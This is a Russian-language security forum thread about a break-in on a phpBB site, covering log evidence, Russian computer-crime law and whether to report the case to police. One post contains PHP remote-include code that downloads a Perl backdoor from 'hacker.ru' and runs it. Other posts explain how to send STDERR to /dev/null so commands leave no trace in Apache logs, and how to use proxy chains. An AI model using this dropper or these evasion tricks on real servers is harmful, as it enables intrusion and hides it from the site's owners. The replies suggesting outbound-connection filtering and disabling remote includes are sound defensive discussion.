Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 След.
RSS
Хроника инцидента
 
Цитата
DiViNE пишет:
Хм, ну при должной сообразительности посетитель мог бы выполнить все, что нужно.
С этим замечанием трудно не согласиться.
Цитата
DiViNE пишет:

немного упорства, и функцию, возвращающую пароль к БД, можно было и выкопать. Исходники спокойно ковырять в оффлайне, см п.1.
Несомненно. Строго говоря, при наличии достаточных ресурсов проломить можно любую защиту (по крайней мере статическую).
Цитата
DiViNE пишет:

3. Запуск программ или сценариев из каталога /tmp наглухо закрыт - программ может быть, а сценариев - это уж звиняйте. sh /path/to/script, perl /path/to/script, php /path/to/script (в php может и можно закрыть, не знаю).
Совершенно верное замечание. Но в описанном случае интерпретатора PHP в систем просто нет.
Цитата
DiViNE пишет:

4. Более продвинутый злоумышленник мог перенаправить STDERR в /dev/null. В error log ничего бы не попало.
Если это сделать первой же командой. Но даже в этом случае останутся журналы доступа Apache.
 
1. Я полагаю, что если сложить человеко-часы, потраченные на патчение phpBB, то за это время/деньги можно было бы уже написать НОВЫЙ (устойчивій) форум. Только все ленятся.
2. Кстати самая богатая форум-хвирма infopop, задолбавшись техподдержкой и патчением своего платного (250 USD, 100000 клиентов) форума UBB, теперь только оказывает услуги по хостингу форумов У НИХ на базе их SQL базы.
3. Для доказательства вины супостата надобно доказать УЩЕРБ (выраженный в государственных денежных единицах страны юрисдикции потерпевшего), и железобетонную причинно-следственную связь между ущербом и действиями супостата.
4. И не надо тыкать нам америкосовской юрсистемой, ои уже давно нюх потеряли на наркоте, и их адвокаты такую лабуду иногда несут по плёвым делам, что просто падай.
 
Цитата
Panas333 пишет:
Для доказательства вины супостата надобно доказать УЩЕРБ

Статья 272 УК РФ: "Неправомерный доступ ... если это деяние повлекло ... копирование информации". Где здесь про ущерб?

Статья 273 УК РФ: "Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному ... копированию информации, ... а равно использование ... таких программ". А здесь где про ущерб?

Я уж было хотел устроить краткий курс ликбеза по объективной и субъективной стороне 272/273 статей, но понял, что половина участников обсуждения даже не потрудилась вчитаться в текст статей, который выше любезно привел коллега.

Лень читать, поверьте на слово: 272 у злодея на лбу написана, 273 вменяется при условии, что использовал хоть малейший скрипт, или если очень разозлит следователя своей несознанкой.

Автор, ау, ну напишите заявление в Управление "К", готов Вам поставить пиво за чуство гражданской ответственности ;)
 
В статье было написано, что поводом к проверке послужили именно записи в error log, так что не факт, что статья бы существовала, перенаправь злоумышленник STDERR в /dev/null :) Access log тоже не особо надежная вещь, ибо данные, бывает, передаются через POST (в случае Perl/CGI (с его param) зачастую то, что передается GET можно передать и через POST. Есть дырки при обработке кук, %ENV и т.д. - все это не будет отражаться нигде. Snort, конечно, можно :)
 
Цитата
DiViNE пишет:
В статье было написано, что поводом к проверке послужили именно записи в error log, так что не факт, что статья бы существовала, перенаправь злоумышленник STDERR в /dev/null :)
Для перенаправления вывода информации об ошибках Apache требуются некоторые права, а получить их в незнакомой системе с первой попытки удается далеко не всегда.
 
давайте не путать доказательную базу преступление, идентификация злоумышлиннаки и возможноси наших законов....
если иентифицировать щлоумышлиника не удается, то скорее всего никакой отдел К за дело не возмется.. Этип предварительного следствия по сути отсутствует как таковой.
в отдел К надо злоумышлиннкаи "за руку вести", то есть, представить все логи, и объяснить, че куда какие запросы посылать (к провайдером), вот тогда они и за дело возьмуться.
доказательная база не проблемма. наше законодательство таково, что любой пук в качестве доказателдьства сойдет.. (а винда то у вас не лицензионная, похищенная то есть, методом копирования....)
 
Цитата
nmalykh пишет:
Цитата
DiViNE пишет:
В статье было написано, что поводом к проверке послужили именно записи в error log, так что не факт, что статья бы существовала, перенаправь злоумышленник STDERR в /dev/null :)
Для перенаправления вывода информации об ошибках Apache требуются некоторые права, а получить их в незнакомой системе с первой попытки удается далеко не всегда.
Не апача, а того, что злоумышленник запускает в системе. Т.е. выполнять не gcc, а gcc 2 gt;/dev/null, или, что удобнее, как-нибудь так (па перле): open(STDERR," gt;/dev/null"); system("gcc; foo; bar; ..."); В апачевский error log ничего не попадет и подозрений не вызовет. Так что на логи полагаться тоже не стоит.
 
Цитата
DiViNE пишет:

Не апача, а того, что злоумышленник запускает в системе. Т.е. выполнять не gcc, а gcc 2 gt;/dev/null, или, что удобнее, как-нибудь так (па перле): open(STDERR," gt;/dev/null"); system("gcc; foo; bar; ..."); В апачевский error log ничего не попадет и подозрений не вызовет. Так что на логи полагаться тоже не стоит.
Попадет при первой же ошибке в команде (например, при отсутствии файла в ожидаемом месте).
В описываемом случае, например, команда lynx, ввденнная через URL, приводила в описываемом случае к появлению записи
Код
sh: lynx: not found

в файле ошибок Apache.

Полагаться только на логи не стоит, но не следует и пренебрегать содержащейся в них информацией.
 
пусть ничего не попадет в эррор логи, но остануться aceess логи. и пусть в них не будут ?cmd=ls+-la и тп, но в них будет обращение к скриптам, содержащим потенциально опасные инструкции (либо к замаскированному shell коду), первая же проверка в трипваре обнаружит новые/видолизмененные скрипты, и с каких ИП происходило частое обращение к тим скриптам, тот и хакер...
опять таки, мы уходим от темы. Хакер дейстьвительно много чего мог сделать. НО ОН НЕ СДЕЛАЛ. Другой хакер может быть сдалал бы это, но он МОГ ошибиться в другом месте.
Кроме того, нет совсем понятно, какую проблеммы мы хотим решить - скрыть действия хакера, или добиться анонимности, не скрывая дейстий. Во втором случае достаточно воспользоваться цепочкой прокси. (в случае бенеального дефейса и тп)
 
Цитата
Phoenix пишет:
 
уговорил. Но тут же ведь дается и пояснение, что такое охраняая законом информация...
Нет, не дается. Охраняемая законом информация описывается в других разделах.
Цитата
Phoenix пишет:

вместе с логами на сервере, их которых становиться ясно, какие именно действия производил злоумшлинник, локами провайдера, которые будут доказывать что  логи сервера не  выдумка, и хотя бы файлы в кеше(кстати есть еще и хистори, где все это будет записано) рисунков форума, еще раз поддтверят то что логи сервера не выдумка. А ежели информация с компьютера хакера будет вдруг уничтожена (почищен кеш, хистори, куки), то это будет выглядить вдвойне подозрительно.
Следите за темой, логи провайдера и тем более пострадавшего не считаются уликой или вещ.доком, но могут  рассматриваться в деле. (Конечно же я не имею ввиду СОРМ)
Цитата
Phoenix пишет:

на основании заведенного уголовного дела. Логов сервер хватит для заведения такого дела с последющим обращеним к првайдеру и изъятием компьютеров у подозреваемых..
Кто вам это сказал? На основании чего вам заведут дело, где состав преступления? Скопированная не охраняемая законом информация не повод заводить дело.
 
Цитата
Гoсть пишет:
 Кто вам это сказал? На основании чего вам заведут дело, где состав преступления? Скопированная не охраняемая законом информация не повод заводить дело.
Это Вы так думаете. Как раз повод, сделать план по отлову хакеров, а в суде люди будут верить всему, что скажет эксперт, а Вас слушать никто не будет.
 
вы думаете что такой план существует?  [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]
 
мда.. ну и наговорили ....
я не знаю можно ли вообще это считать преступлением? это примерно тоже если пингануть тачку на предмет активности хоста.. тоже ведь получение информации... никаких деструктивных действий не было хищения баз с номерами карт тоже не было.. тут уж как говориться следователь дело шъет:)... надо оторваться на ком либо наверное...
на месте автора я бы просто провел ревизию, пропатчил и некоторое время понаблюдал за активностью...если бы попытки  повторились тогда да писал бы провам бил в барабаны.., а так это просто киддис какой то изучал сайт. остальное все имхо просто глупости.
вообще статья эта с другой стороны баррикад автор может быть видит это совсем иначе как я...
 
А был ли на хостинге интерпретатор perl ? Тогда  для залива файлов достаточно было использовать команду include в phpBB
echo __START_; include("http://hacker.ru/remote.php");echo _END_

Код
 lt;? 
  /* remote.php */
$sock = fsockopen("hacker.ru", 80, $errno, $errstr);
if(!$sock) {
echo("$errno($errstr)");
return;
}
else { 
fputs ($sock, "GET /bd.txt  HTTP/1.0\r\n\r\n"); nbsp;  
$in=0;
$fp = fopen("/tmp/bd.pl","w+");
while(!feof($sock)) {
$s = fgets($sock,4096);
if($in==1) { fwrite($fp,$s);  }
if(eregi("^\r\n$",$s)) { $in=1; } 
}
fclose($fp);
}
fclose ($sock);
 
? gt;


потом просто passthru("perl /tmp/bd.pl")
Я могу и ошибаться ...
 
да да все именно так, я на это указывал в начале постинга но пробелма а точнее  особенность данной темы в том что у автора просто небольшой сайт на одном сервере где больше ничего нет и там действительно нельзя залить файлы.. (не уверен сам не видел но все-таки чем черт не шутит).. а без записи :(...
ну правда я не понял про интерпретатор php.. сам php же исполняется.. это на мой взгляд одно и тоже.
 
2ams666: php исполняет модуль apache
 
Цитата
rav3n пишет:
А был ли на хостинге интерпретатор perl ? Тогда  для залива файлов достаточно было использовать команду include в phpBB
echo __START_; include("http://hacker.ru/remote.php");echo _END_
Против подобных фокусов разумно (IMHO) фильтровать попытки организации исходящих соединений с Web-сервера.
 
или запрет remote инклудов в php.ini  [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
имхо, если на каждый "скан" писать заявление в "органы", то скоро из этих самых "органов" вообще не будешь вылезать, а станешь ходить туда, как на работу. ;)
з.ы. а если бы киддис смог получить рута и нагадил, тогда уж без вариантов....
 
Цитата
nmalykh пишет:
 
Цитата
DiViNE пишет:

Не апача, а того, что злоумышленник запускает в системе. Т.е. выполнять не gcc, а gcc 2 gt;/dev/null, или, что удобнее, как-нибудь так (па перле): open(STDERR," gt;/dev/null"); system("gcc; foo; bar; ..."); В апачевский error log ничего не попадет и подозрений не вызовет. Так что на логи полагаться тоже не стоит.
Попадет при первой же ошибке в команде (например, при отсутствии файла в ожидаемом месте).
В описываемом случае, например, команда lynx, ввденнная через URL, приводила в описываемом случае к появлению записи
Код
sh: lynx: not found

в файле ошибок Apache.
С какой стати она туда попадет, если STDERR перенаправлен в /dev/null?!
Страницы: Пред. 1 2 3 4 5 След.
Читают тему